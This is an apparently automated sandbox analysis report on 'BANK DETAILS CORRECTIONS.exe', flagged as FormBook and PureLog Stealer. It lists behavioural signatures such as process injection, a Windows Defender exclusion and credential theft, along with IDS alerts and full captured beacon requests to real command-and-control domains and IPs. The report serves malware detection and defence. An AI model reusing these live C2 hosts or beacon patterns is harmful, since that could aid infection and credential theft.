Windows Analysis Report
BANK DETAILS CORRECTIONS.exe

Overview

General Information

Sample name: BANK DETAILS CORRECTIONS.exe
Analysis ID: 1411001
MD5: 6b3d6565f98f00436cf229258a5ac2c8
SHA1: 6fd6b3e765c4e2d6c262e48f3da8040f2f72e41c
SHA256: d48e76a16a20d4af37091f9dea89ce3fa2341e273a3898ac1b8b398c2a5793d5
Tags: exe
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.nikazo.xyz/e6xn/ Avira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for submitted file
Source: BANK DETAILS CORRECTIONS.exe ReversingLabs: Detection: 71%
Yara detected FormBook
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: BANK DETAILS CORRECTIONS.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: BANK DETAILS CORRECTIONS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BANK DETAILS CORRECTIONS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 4x nop then jmp 076DBD8Dh 0_2_076DB423
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 4x nop then jmp 06F8B065h 13_2_06F8A6FB

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49715 -> 149.88.64.51:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49716 -> 47.76.88.64:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49717 -> 47.76.88.64:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49719 -> 47.76.88.64:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49721 -> 144.76.75.181:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49722 -> 144.76.75.181:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49724 -> 144.76.75.181:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49725 -> 64.190.62.22:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49726 -> 64.190.62.22:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49728 -> 64.190.62.22:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49729 -> 104.21.63.135:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49730 -> 104.21.63.135:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49732 -> 104.21.63.135:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49733 -> 49.0.230.183:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49734 -> 49.0.230.183:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49736 -> 49.0.230.183:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49737 -> 66.29.152.141:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49738 -> 66.29.152.141:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49740 -> 66.29.152.141:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49741 -> 192.64.119.184:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49742 -> 192.64.119.184:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49744 -> 192.64.119.184:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49745 -> 87.236.19.107:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49746 -> 87.236.19.107:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49748 -> 87.236.19.107:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49749 -> 154.7.21.55:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49750 -> 154.7.21.55:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49752 -> 154.7.21.55:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49753 -> 50.6.160.34:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49754 -> 50.6.160.34:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49756 -> 50.6.160.34:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49757 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49758 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49760 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49761 -> 89.31.143.90:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49762 -> 89.31.143.90:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49764 -> 89.31.143.90:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.nikazo.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.236.19.107 87.236.19.107
Source: Joe Sandbox View IP Address: 103.197.25.241 103.197.25.241
Source: Joe Sandbox View IP Address: 64.190.62.22 64.190.62.22
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
Source: Joe Sandbox View ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: NBS11696US NBS11696US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cqyh.oneConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.d4ffo73dz.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.appmystartup.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.oc7o0.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mgn.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=fK5JMP1eyt4jdSIw5YXXC01WYkEietwRjqQFc45Aj4a+GaPHnYBED0rkUElBfcfrwtDI0snSXtvXktZSmOPgjr2IHnyFN7VJ42KSbRcfuNaQ+9lGPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nikazo.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.605alibahis.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pro-ecoproduct.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.supportstuiwords.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=1UUYHFL4LdVgOiboeMjc0IWbZOVr8VDrWpD/OUuuls53JWREudPDYQ+nxzsCxMG6BUvSIs7k/B5ZpvZv05F76qqNcXO9IRc03t2/8HV/ry1cldLuRw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.syscomputerrd.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=0vI33Q4NEpmtOF7zniUBuj/B9uVSpeQXctuTHh1MPiMb1OOu6LKWAuvExYXMr2bPJ/7wAe8CJHHvd3UWKZqUB7/Hcv68Qi5JcHFgKGRsF2oedTZ7pw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dxgsf.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /e6xn/?bvOt=I+7uQ1p9U2QgrZ2LiZBQD/xPqYJdH7KI3wBT7UIkgW5Aog6q3Z2jXuQC4TUh/9LTZ7Sd+JF5RXm6MN/mwd+CmdOx0GtGi60mugQ+ypEmsJunmkEeVg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: crossorigin="anonymous"></script> </head><body class="error404 custom-background wp-embed-responsive theme-flash everest-forms-no-js woocommerce-no-js hfeed header-sticky left-logo-right-menu"><div id="preloader-background"><div id="spinners"><div id="preloader"> <span></span> <span></span> <span></span> <span></span> <span></span></div></div></div><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Saltar al contenido</a><header id="masthead" class="site-header" role="banner"><div class="header-top"><div class="tg-container"><div class="tg-column-wrapper clearfix"><div class="left-content"><ul class="contact-info"><li><i class="fa fa-map-marker"></i>Santo Domingo RD</li><li><i class="fa fa-phone"></i>849-250-5089</li><li><i class="fa fa-envelope"></i>syscomputerrd@gmail.com</li></ul></div><div class="right-content"><div class="menu-social-container"><ul id="menu-social" class="social-menu"><li id="menu-item-635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-635"><a href="https://www.facebook.com/syscomputerrd"><span class="screen-reader-text">facebook</span></a></li><li id="menu-item-639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-639"><a href="https://www.instagram.com/sys_computer/"><span class="screen-reader-text">instagram</span></a></li><li id="menu-item-640" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-640"><a href="https://www.youtube.com/channel/UCz92hpqzrnHultxRscMZ5pQ"><span class="screen-reader-text">YOUTUBE</span></a></li></ul></div></div></div></div></div><div class="header-bottom"><div class="tg-container"><div class="logo"><div class="logo-text site-branding"><p class="site-title"><a href="https://hzw.avt.temporary.site/" rel="home">MOVIMIENTO JUVENTUD COMUNITARIA</a></p></div></div><div class="site-navigation-wrapper"><nav id="site-navigation" class="main-navigation" role="navigation"><div class="menu-toggle"> <i class="fa fa-bars"></i></div><div class="menu-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-741"><a href="https://hzw.avt.temporary.site/">Inicio</a></li><li id="menu-item-748" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-748"><a href="https://hzw.avt.temporary.site/blog-4/">Movimiento JC</a></li><li id="menu-item-737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-737"><a href="https://hzw.avt.temporary.site/contact/">Contact</a></li></ul></div></nav></div><div class="header-action-container"><div class="cart-wrap"><div class="flash-cart-views"> <a href="https://hzw.avt.temporary.site/cart/" class="wcmenucart-contents"> <i class="fa fa-opencart"></i> <span class="cart-value">0</span> </a></div><div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Carrito</h2><div class="widget_shopping_cart_content"></div><
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: crossorigin="anonymous"></script> </head><body class="error404 custom-background wp-embed-responsive theme-flash everest-forms-no-js woocommerce-no-js hfeed header-sticky left-logo-right-menu"><div id="preloader-background"><div id="spinners"><div id="preloader"> <span></span> <span></span> <span></span> <span></span> <span></span></div></div></div><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Saltar al contenido</a><header id="masthead" class="site-header" role="banner"><div class="header-top"><div class="tg-container"><div class="tg-column-wrapper clearfix"><div class="left-content"><ul class="contact-info"><li><i class="fa fa-map-marker"></i>Santo Domingo RD</li><li><i class="fa fa-phone"></i>849-250-5089</li><li><i class="fa fa-envelope"></i>syscomputerrd@gmail.com</li></ul></div><div class="right-content"><div class="menu-social-container"><ul id="menu-social" class="social-menu"><li id="menu-item-635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-635"><a href="https://www.facebook.com/syscomputerrd"><span class="screen-reader-text">facebook</span></a></li><li id="menu-item-639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-639"><a href="https://www.instagram.com/sys_computer/"><span class="screen-reader-text">instagram</span></a></li><li id="menu-item-640" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-640"><a 